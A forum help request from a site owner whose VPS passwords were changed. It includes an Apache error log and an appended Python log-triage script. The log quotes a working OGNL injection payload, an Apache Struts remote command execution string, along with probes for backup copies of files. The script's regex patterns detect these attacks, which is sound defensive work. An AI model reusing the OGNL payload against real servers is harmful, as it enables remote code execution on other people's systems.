Softaculous


Topic : hack or bug?


Posted By: syntecom on September 10, 2018, 10:33 pm
Hi, I'm new to Webuzo control panel administration... I have my site on a Digital Ocean VPS...

Since yesterday I have found that all my user access passwords (MySQL DB) have been changed to the number "1" hashed in MD5. So, all my users have lost their access.

Something has hacked my control panel; something is trying to execute a .vb extension on every PHP page of my site...

My control panel (Webuzo) password is the same (pretty complicated), so I think they got access by exploiting some "BUG" in third-party tools. Any ideas?

I'm attaching the complete error log to this topic.

Thanks in advance... please excuse my English.

Error LOG example---------------------------------------------------

[Sun Sep 09 11:27:24.315808 2018] [core:error] [pid 27063] (36)File name too long: [client 190.112.100.129:56843] AH00036: access to /scripts/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString.json failed (filesystem path '/home/cpcelr/public_html/scripts/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString.json')
[Sun Sep 09 11:27:23.829682 2018] [core:error] [pid 28402] (36)File name too long: [client 190.112.100.129:56839] AH00036: access to /scripts/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString.json failed (filesystem path '/home/cpcelr/public_html/scripts/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString.json')
[Sun Sep 09 11:26:46.367792 2018] [core:error] [pid 27477] (36)File name too long: [client 190.112.100.129:56718] AH00036: access to /3dParty/colorbox/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?

[Sun Sep 09 11:21:56.262909 2018] [:error] [pid 26189] [client 190.112.100.129:55063] PHP Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, string given in /home/cpcelr/public_html/noticia.php on line 7
[Sun Sep 09 11:21:55.269229 2018] [:error] [pid 2751] [client 190.112.100.129:55056] script '/home/cpcelr/public_html/tecnica-maletin.php.vb' not found or unable to stat
[Sun Sep 09 11:21:54.711651 2018] [:error] [pid 26189] [client 190.112.100.129:55054] script '/home/cpcelr/public_html/tecnica-maletin.php.cs' not found or unable to stat
[Sun Sep 09 11:21:54.142623 2018] [:error] [pid 27063] [client 190.112.100.129:55052] script '/home/cpcelr/public_html/Copy of tecnica-maletin.php' not found or unable to stat
[Sun Sep 09 11:21:52.437285 2018] [:error] [pid 16393] [client 190.112.100.129:55044] script '/home/cpcelr/public_html/tecnica-maletin.php.bak' not found or unable to stat
[Sun Sep 09 11:21:40.274565 2018] [:error] [pid 26188] [client 190.112.100.129:55008] script '/home/cpcelr/public_html/servicios-reglamento.php.vb' not found or unable to stat
[Sun Sep 09 11:21:39.713788 2018] [:error] [pid 27063] [client 190.112.100.129:55006] script '/home/cpcelr/public_html/servicios-reglamento.php.cs' not found or unable to stat
[Sun Sep 09 11:21:39.155558 2018] [:error] [pid 26190] [client 190.112.100.129:55001] script '/home/cpcelr/public_html/Copy of servicios-reglamento.php' not found or unable to stat
[Sun Sep 09 11:21:37.442874 2018] [:error] [pid 27063] [client 190.112.100.129:54996] script '/home/cpcelr/public_html/servicios-reglamento.php.bak' not found or unable to stat
[Sun Sep 09 11:21:08.379206 2018] [:error] [pid 16393] [client 190.112.100.129:54865] PHP Warning: array_values() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:08.379177 2018] [:error] [pid 16393] [client 190.112.100.129:54865] PHP Warning: array_keys() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:07.811457 2018] [:error] [pid 27078] [client 190.112.100.129:54862] PHP Warning: array_values() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:07.811418 2018] [:error] [pid 27078] [client 190.112.100.129:54862] PHP Warning: array_keys() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:06.613840 2018] [:error] [pid 26190] [client 190.112.100.129:54856] PHP Warning: array_values() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:06.613797 2018] [:error] [pid 26190] [client 190.112.100.129:54856] PHP Warning: array_keys() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
[Sun Sep 09 11:21:05.505184 2018] [:error] [pid 27078] [client 190.112.100.129:54852] script '/home/cpcelr/public_html/servicios-fondo.php.vb' not found or unable to stat
[Sun Sep 09 11:21:04.934223 2018] [:error] [pid 26189] [client 190.112.100.129:54849] script '/home/cpcelr/public_html/servicios-fondo.php.cs' not found or unable to stat
[Sun Sep 09 11:21:04.664179 2018] [:error] [pid 26188] [client 190.112.100.129:54848] PHP Warning: array_values() expects parameter 1 to be array, null given in /home/cpcelr/public_html/sgd/core/view.php on line 30
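
An added example, not part of the original post: a small Python triage for an Apache 2.4 error log like the one above. It groups entries per client and tags the two request patterns visible in it (OGNL expressions in the request path, and guessed copies such as `.php.bak`, `.php.vb`, `.php.cs` and `Copy of ...`). The sample lines, addresses, paths and the `min_probes` threshold are constructed assumptions.

```python
import re
from collections import Counter, defaultdict

# Apache 2.4 error-log line: [time] [module:level] [pid N] (errno)text: [client IP:port] message
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<mod>[^\]]*)\] \[pid \d+\] "
    r"(?:\(\d+\)[^:]*: )?\[client (?P<ip>[^\]]+):\d+\] (?P<msg>.*)$"
)
# First matching rule wins; patterns are taken from the log shown in the post.
RULES = [
    ("ognl_probe", re.compile(r"#_memberAccess|@ognl\.|java\.lang\.Runtime")),
    ("backup_file_guess", re.compile(
        r"script '[^']*(?:\.php\.(?:bak|vb|cs)|/Copy of [^']*)' not found")),
    ("php_warning", re.compile(r"PHP (?:Warning|Notice):")),
]
# Constructed sample input (documentation IP ranges, made-up paths).
SAMPLE = """\
[Sun Sep 09 11:27:24.315808 2018] [core:error] [pid 27063] (36)File name too long: [client 203.0.113.5:56843] AH00036: access to /scripts/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(...) failed
[Sun Sep 09 11:21:55.269229 2018] [:error] [pid 2751] [client 203.0.113.5:55056] script '/var/www/html/page.php.vb' not found or unable to stat
[Sun Sep 09 11:21:54.711651 2018] [:error] [pid 26189] [client 203.0.113.5:55054] script '/var/www/html/page.php.cs' not found or unable to stat
[Sun Sep 09 11:21:54.142623 2018] [:error] [pid 27063] [client 203.0.113.5:55052] script '/var/www/html/Copy of page.php' not found or unable to stat
[Sun Sep 09 11:21:08.379206 2018] [:error] [pid 16393] [client 203.0.113.5:54865] PHP Warning: array_values() expects parameter 1 to be array, null given in /var/www/html/view.php on line 30
[Sun Sep 09 11:20:00.000000 2018] [:error] [pid 100] [client 198.51.100.7:40000] script '/var/www/html/favicon.php' not found or unable to stat
""".splitlines()

def classify(msg):
    """Return the name of the first rule matching the log message, else 'other'."""
    for name, rx in RULES:
        if rx.search(msg):
            return name
    return "other"

def triage(lines):
    """Return {client_ip: Counter(category -> count)} for every parseable line."""
    per_client = defaultdict(Counter)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            per_client[m["ip"]][classify(m["msg"])] += 1
    return per_client

def scanners(per_client, min_probes=3):
    """Clients with at least min_probes probe-type entries (threshold is an assumption)."""
    return sorted(ip for ip, c in per_client.items()
                  if c["ognl_probe"] + c["backup_file_guess"] >= min_probes)

if __name__ == "__main__":
    for ip, counts in triage(SAMPLE).items():
        print(ip, dict(counts))
```

Every entry counted here comes from the error log, so it records requests the server rejected or could not serve; the access log is where to check what the same clients received a 200 response for.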
